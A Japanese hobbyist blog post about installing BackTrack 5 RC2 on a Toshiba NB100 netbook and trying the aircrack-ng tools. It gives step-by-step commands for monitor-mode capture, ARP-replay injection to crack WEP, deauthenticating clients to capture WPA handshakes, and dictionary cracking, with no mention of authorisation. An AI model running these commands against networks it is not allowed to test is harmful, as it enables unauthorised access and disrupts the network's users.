NB100 BT5RC2_32 インストール+aircrack-ng

NB100 をひょんなことから借りれることに。
Atherosチップをつんだネットブックです。

ネットブックを買ったことがないのでワクテカです。

TOSHIBA ネットブックPC HDD搭載モデル NB100/H コスミックブラック  PANB100HNL

TOSHIBA ネットブックPC HDD搭載モデル NB100/H コスミックブラック PANB100HNL

とりあえず目標はWEPキークラックを試すこと。
BT5RC2 は ハッカージャパンの付録を使うです。

Hacker Japan (ハッカー ジャパン) 2012年 09月号 [雑誌]

Hacker Japan (ハッカー ジャパン) 2012年 09月号 [雑誌]


DVD-RW を近所の100均 でGET
DVDドライブはその辺に転がっているものを使います。
HDDインストール開始でございます。


起動すると画面解像度を聞かれるため
それっぽいの「800*600」を選択
デスクトップにインストールアイコンが出てくるのでクリックするとインストールが始まります。


インストールに2時間くらいかかりました。
とりあえず更新プログラムはいれておこうっと。

#apt-get update
#apt-get upgrade
#apt-get dist-upgrade

        • -

ここからが本題。

■モニタモード
1.モニターモードに変更
# airmon-ng start wlan0

2.airodump-ngでパケット収集
# airodump-ng mon0<>
■受動的解析
別端末で

3.オプションでターゲットを絞り込んでパケット収集
# airodump-ng --channel (ターゲットのchannel)(例:11) --essid (ターゲットのESSID) --write (適当な名前を) mon0

■能動的解析 ArpReplay
別端末で
アクセスポイントに認証要求
# aireplay-ng -1 600 -q 300 -a (送信元MAC) mon0

別端末で
ARPリプライの開始
# aireplay-ng -3 -b (送信元MAC) mon0

しばらくするとがんがんパケットを飛ばし始めます。

■解析
別端末で
# aircrack-ng -b (APのMAC) (キャプチャファイル)

解析時間は10分くらいでした。。。なにこれこわいw。<>

別端末で

1.オプションでターゲットを絞り込んでパケット収集
# airodump-ng --channel (ターゲットのchannel) --essid (ターゲットのESSID) --write (適当な名前を) mon0

別端末で

2.ターゲットを切断させて4wayパケットの取得
# aaireplay-ng -0 1 -a (APのMAC) -c (クライアントのMAC) mon0

何度か繰り替えすと
パケット収集画面に 以下メッセージが出現します。
[ WPA handshake: (APのMAC)

ココまで着たらパケット収集は終了です。

■解析
別端末で
# aircrack-ng -w 辞書ファイル -b (APのMAC) (キャプチャファイル)

解析できるかどうかは辞書の精度に依存します。
辞書アタックなのでめちゃめちゃ時間がかかります。

■参考資料
http://www.byakuya-shobo.co.jp/hj/moh/pdf/moh_p228_p235.pdf

おもしろかったです。